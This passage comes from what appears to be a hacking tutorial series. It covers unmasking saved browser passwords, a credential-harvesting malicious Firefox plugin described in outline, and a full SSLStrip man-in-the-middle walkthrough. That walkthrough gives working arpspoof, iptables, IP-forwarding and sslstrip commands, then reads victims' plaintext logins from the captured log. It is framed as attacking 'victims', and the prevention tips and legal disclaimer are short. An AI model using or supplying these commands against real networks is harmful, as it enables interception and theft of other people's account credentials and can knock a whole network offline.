revealed 7. What if it is on Google Chrome browser? The steps is the same. Open the log in page, right click the password box and choose inspect element 8. Change the input type="password" to type="text". The password is revealed. Lesson 29: Hacking Internet User’s Passwords Using ‘Malicious’ Firefox Plugin. The title Hacking Internet Users Password Using Malicious Firefox Plugin has come after some students asked about the possibility to gather username and password from browser plugin. The answer is yes you can gather a username and password from internet users when they installed a malicious plugin. According to wikipedia a plugin is In computing, a plug-in (or plugin, extension) is a software component that adds a specific feature to an existing software application. When an application supports plug-ins, it enables customization. The common examples are the plug-ins used in web browsers to add new features such as searchengines, virus scanners, or the ability to utilize a new file type such as a new video format. in this Hacking Internet Users Password Using Malicious Firefox Plugin case, the attacker will change or add or modify or create the main function of a firefox plugin and override or rewrite some function to do some malicious activities with benefit for the attacker. Requirements: 1. Firefox malicious plugin 2. Understand Javascript 3. Social Engineering How to Hacking Internet Users Password Using Malicious Firefox Plugin: The victim browser, which has a malicious Firefox plugin installed, is accessing the internet. As victim browses the internet, the infected browser will also send the data to the attacker server. The data is which website victim visited, and send the username and password as well. the attacker harvester website will grab all GET or POST method and store it in a simple TXT file, but it can change to other database server as well. Conclusion: 1. Make sure you download the plugin only from trusted source (e.g: http://addons.mozilla.org/). Lesson 30: Breaking SSL Encryption Level : Medium, Advanced Some people ask "Are you sure SSL(Secure Socket Layer) port 443 can be hacked and we know the password sent over the network??"…..how to break ssl protection using sslstrip? What is SSL? actually if you see my explanation about SSL in my previous post, when we try to break the encryption it’s a little bit hard to break, but here in this tutorial I will explain how to break the SSL encryption without breaking the SSL encryption using Man in the Middle Attack :-). Man in the Middle Attack Requirement : 1. KALI LINUX 2. Arpspoof 3. IPTables 4. SSLStrip 5. NetStat SSLSTRIP may need to be downloaded and installed. Perform the Attack – Man in the Middle Attack 1. Set your Linux box to make it can forward every incoming port(enable port forwarding). echo ’1’ > /proc/sys/net/ipv4/ip_forward This code will let your Linux Backtrack have ability to forward every packet that was not intended for your machine. 2. Know your network gateway netstat -nr For example i’ve already know that my gateway address is 192.168.8.8 3. Use ARP spoof to perform Man in the Middle Attack arpspoof -i eth0 192.168.8.8 a. Change "eth0" to your network card that currently connected to the network. Usually it is eth0 or wlan0. b. Change "192.168.8.8" to your network default gateway. c. In this tutorial I use arpspoof to entire network. Be careful if your network has a large userbase connected to it, because it will crash your network and bring your network down. SSL Strip Created by Moxie Morlinspike who provides a demonstration of the HTTPS stripping attacks that presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homographsimilar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. -Taken from author websiteThis all happens on the fly, and is practically will invisible to users. The only way to notice is by checking the URL in the address bar where normally it would display HTTPS, it will now display HTTP instead. Install SSL Strip (optional) 1. Download SSL Strip 2. tar zxvf sslstrip-0.9.tar.gz 3. cd sslstrip-0.9 4. python setup.py install Break SSL Protection Using SSLStrip and Kali Linux 1. We need to set up a firewall rule (using iptables) to redirect requests from port 80 to port 8080 to ensure our outgoing connections (from SSL Strip) get routed to the proper port. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --toport 8080 2. After finished set up iptables, the next step we need to redirect all network HTTP traffic through our computer using ARPSpoof (don’t forget to enable IP forwarding) echo ’1’ > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 192.168.8.8 3. When everything running well, you will see that ARPSpoof capturing network traffic, then the next step you need to start your SSL Strip by opening new terminal(CTRL+ALT+T) sslstrip -l 8080 "-l" tells the system to listen on specified port. SSL Strip is already running and waiting for victim opening SSL URL such as (https://mail.google.com; https://mail.yahoo.com; etc) As a victim I will try to open https://mail.live.com. When I open the page, I expect the url to no longer be in secure socket layer. The URL changed into HTTP. 4. After SSL Strip capturing enough data, to stop ARPSpoof and SSL Strip just hit CTRL + C. After you stop it, the whole network will be down and cannot be accessed for a while(it shouldn’t take long time), this can happen because ARPSpoof didn’t automatically repopulate the ARP tables with router proper MAC address. 5. Inside the SSL Strip folder there will be a new file created "sslstrip.log" that stores all information that already captured over the HTTP protocol and even the HTTPS. Just take a look to the file using your favorite text editor. Below picture is the content of my sslstrip.log :that already captured victim data when they open https://mail.live.com. You can see the plain data of username and password there in the log. Prevention of SSL Strip Attack 1. If you are on public network (internet cafe, unsecured hotspot, etc) minimalize login into your personal account. 2. Use SSH Tunneling 3. Keep your eyes open. Remember This ! Don't use this for anything other than educational purposes or on a server with permission from a client. Don’t get shocked if this application will insure you go to jail faster if you use for an unintended purpose by law.
© Copyright 2024